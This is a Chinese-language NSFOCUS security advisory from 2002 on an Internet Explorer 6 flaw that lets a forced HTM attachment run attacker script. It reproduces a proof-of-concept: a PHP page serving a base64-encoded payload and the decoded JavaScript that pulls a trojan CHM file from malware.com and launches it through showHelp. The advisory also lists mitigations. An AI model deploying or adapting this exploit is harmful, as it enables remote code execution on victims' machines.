首页 -> 安全研究

安全研究

安全漏洞
Microsoft Internet Explorer文件附件远程脚本执行漏洞

发布日期:2002-08-13
更新日期:2002-08-18

受影响系统:
Microsoft Internet Explorer 6.0
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows ME
    - Microsoft Windows 98 SE
    - Microsoft Windows 98
    - Microsoft Windows 2000 SP3
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
描述:
BUGTRAQ  ID: 5450

Microsoft Internet Explorer是一款流行的WEB浏览器。

Microsoft Internet Explorer 6.0存在漏洞,远程攻击者可以利用这个漏洞允许恶意文件附件以用户进程权限执行任意代码。

HTM文件与IE相关联,可能导致攻击者迫使IE下载恶意HTM文件,下载的HTM文件可以包含攻击者提供的恶意脚本指令,并且在目标用户系统上执行。

这个漏洞证实在Internet Explorer 6,其他版本也可能存在此漏洞,不过没有得到证实。

<*来源:http-equiv@excite.comhttp-equiv@excite.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=102924708526577&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http-equiv@excite.comhttp-equiv@excite.com)提供了如下测试方法:

HTM文件与IE关联,我们迫使我们的*.htm文件通过服务器"错误配置"和我们的PHP包打开:

<?
function malware()
{
header("Content-type: text/html");
header("Content-Disposition: attachment");
echo base64_decode(
'PGltZyBkeW5zcmM9Imh0dHA6Ly93d3cubWFsd2FyZS5jb20vbW'.
'Fsd2FyZS9tYWx3YXJlLmNobSIgd2lkdGg9MSBoZWlnaHQ9MT4N'.
'Cg0KPFNDUklQVD4NCg0KLy8gNy4wMi4wMiBodHRwOi8vd3d3Lm'.
'1hbHdhcmUuY29tDQoNCi8vIHlvdSBtYXkgY29uc2lkZXIgd3Jp'.
'dGluZyBzZXZlcmFsIGxpbmVzDQovLyBpbiBjYXNlIG1hbHdhcm'.
'UuY2htIGFycml2ZXMgYXMgWzFdIG9yIFsyXSBldGMNCg0KZnVu'.
'Y3Rpb24gbWFsd2FyZSgpDQp7DQpzPWRvY3VtZW50LlVSTDsNCn'.
'BhdGg9cy5zdWJzdHIoLTAscy5sYXN0SW5kZXhPZigiXFwiKSk7'.
'DQpwYXRoPXVuZXNjYXBlKHBhdGgpOw0KZG9jdW1lbnQud3JpdG'.
'UoJzxGT1JNIG5hbWU9Im1hbHdhcmUiIEFDVElPTj0iamF2YXNj'.
'cmlwdDp3aW5kb3cuc2hvd0hlbHAoZG9jdW1lbnQuZm9ybXNbMF'.
'0uZWxlbWVudHNbMF0udmFsdWUpIj4nKTsNCmRvY3VtZW50Lndy'.
'aXRlKCc8Zm9ybT48aW5wdXQgdHlwZT0iaGlkZGVuIiAgc2l6ZT'.
'0iNDAiIG1heGxlbmd0aD0iODAiIHZhbHVlPSInK3BhdGgrJ1xc'.
'bWFsd2FyZVsxXS5jaG0iPjwvZm9ybT4nKTsNCnNldFRpbWVvdX'.
'QoJ2RvY3VtZW50Lm1hbHdhcmUuc3VibWl0KCknLDEwMDAwKTsN'.
'CiB9IA0Kc2V0VGltZW91dCgibWFsd2FyZSgpIiwyNTAwKTsgIA'.
'0KPC9TQ1JJUFQ+DQogDQoNCg=='.'');}
{ malware(); }
PHP ?>


  <iframe src=<? echo $PHP_SELF ?> width=1 height=1>

上面我们的PHP包包含恶意脚本判断TIF位置和我们更改过的木马*.chm文件如下:

<img dynsrc="http://www.malware.com/malware/malware.chm" width=1
height=1>


<SCRIPT>


// 7.02.02 http://www.malware.com


function malware()
{
s=document.URL;
path=s.substr(-0,s.lastIndexOf(""));
path=unescape(path);
document.write('<FORM name="malware"
ACTION="javascript:window.showHelp(document.forms[0].elements
[0].value)">');
document.write('<form><input type="hidden" size="40" maxlength="80"
value="'+path+'malware[1].chm"></form>');
setTimeout('document.malware.submit()',10000);
}
setTimeout("malware()",2500);
</SCRIPT>

注:*.chm文件路径必须足够长。

执行此脚本时可产生对*.htm文件的默认警告:

[插图: http://www.malware.com/malwarez.png 7KB]

如果我们选择打开,我们就再次判断*.chm在TIF中的路径并使用我们的脚本代码进行搜索和触发执行。

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 暂时关闭IE浏览器的Javascript的功能。

厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/windows/ie/default.asp

浏览次数:3355
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障